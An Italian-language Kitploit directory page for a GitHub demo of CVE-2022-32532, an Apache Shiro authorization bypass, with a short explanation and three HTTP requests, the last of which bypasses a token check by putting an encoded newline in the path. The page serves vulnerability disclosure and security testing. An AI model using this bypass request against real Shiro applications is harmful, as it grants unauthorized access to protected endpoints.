Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-32532 — Apache Shiro CVE-2022-32532 | Kitploit
Strumenti/GitHubGitHub/lay0us/cve-2022-32532
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHublay0us/cve-2022-32532

CVE-2022-32532

Apache Shiro CVE-2022-32532

Vedi Repository
13254 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-32532

Informazioni

Questo è un progetto demo, che mostra solo una delle condizioni per sfruttare questa vulnerabilità (CVE-2022-32532).

In effetti, ci sono più modi per sfruttarla, finché gli sviluppatori usano RegExPatternMatcher, ci sarà una possibile vulnerabilità di bypass.

Introduzione

La verifica dell'header di richiesta Token è richiesta nella configurazione corrente, altrimenti non si ha il permesso di accedere all'interfaccia sotto /permit

Questa richiesta può avere successo

root@kitploit:~
GET /permit/any HTTP/1.1
Token: 4ra1n

L'accesso non è consentito quando non c'è alcun header di richiesta Token

root@kitploit:~
GET /permit/any HTTP/1.1

Può essere bypassata in modo semplice in configurazioni speciali ma comuni

root@kitploit:~
GET /permit/a%0any HTTP/1.1

Riferimenti

https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh

Questa vulnerabilità è simile a Spring-Security CVE-2022-22978

Ringraziamenti a bdemers (Apache Shiro PMC) e chybeta (Ricercatore di Sicurezza)

Scarica lo strumento